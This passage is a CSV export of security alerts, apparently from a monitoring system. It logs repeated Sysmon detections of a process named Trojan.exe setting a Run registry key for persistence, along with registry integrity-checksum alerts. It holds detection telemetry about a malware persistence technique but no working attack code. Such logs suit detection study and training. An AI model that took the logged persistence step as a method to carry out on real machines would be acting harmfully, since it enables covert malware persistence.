..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:05.610310400Z"",""eventRecordID"":""1882"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:05.606\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:05.606"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:08.001",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:04.590 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:04.592651100Z"",""eventRecordID"":""1875"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:04.590\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:04.590"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:26:06.955",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:03.559 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:03.559759300Z"",""eventRecordID"":""1874"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:03.559\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:03.559"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John 
Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:05.939",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:02.543 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:02.544262200Z"",""eventRecordID"":""1873"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:02.543\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:02.543"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:04.923",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:01.527 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:01.530183000Z"",""eventRecordID"":""1872"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:01.527\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:01.527"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:26:03.909",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:00.512 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:00.513605200Z"",""eventRecordID"":""1871"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:00.512\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:00.512"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John 
Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:02.954",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:59.496 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:59.499257300Z"",""eventRecordID"":""1870"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:59.496\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:59.496"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:01.985",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:58.480 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:58.482524200Z"",""eventRecordID"":""1869"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:58.480\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:58.480"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:01.611",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. 
+Old md5sum was: '496e80acc19637c8daf8c286b6ea10f0' +New md5sum is : '8efb4315bce364ff5fc1ea393021f2d5' +Old sha1sum was: '88ef9e17f6f18f6242bf8a46b383b017d42012b9' +New sha1sum is : '66c3c5bb7b6fc78ac1bba9905a2803f0ab51d3b5' +", +"May 24, 2020 @ 16:26:01.596",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '89598d32459256342f73e9b832b618dc' +New md5sum is : 'bac6942daff7935ddffecaf1ad4a5459' +Old sha1sum was: '68aacf23a86d664018607a7fc5d1379269af8643' +New sha1sum is : '5e5d36881472a35a5cc8de540bac37b1760f64d4' +", +"May 24, 2020 @ 16:26:00.845",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:57.449 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:57.451113000Z"",""eventRecordID"":""1868"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 
16:25:57.449\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:57.449"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:25:59.814",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:56.418 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:56.424343300Z"",""eventRecordID"":""1867"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:56.418\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:56.418"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John 
Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:59.642",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer' checksum changed. +Old md5sum was: 'd41d8cd98f00b204e9800998ecf8427e' +New md5sum is : '497a8c7081c737f07c267a30b1538ff9' +Old sha1sum was: 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +New sha1sum is : '58d9cdbd07af978efc5e91b8e7a66696280d3b1e' +", +"May 24, 2020 @ 16:25:59.251",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:55.387 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:55.388958700Z"",""eventRecordID"":""1866"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value 
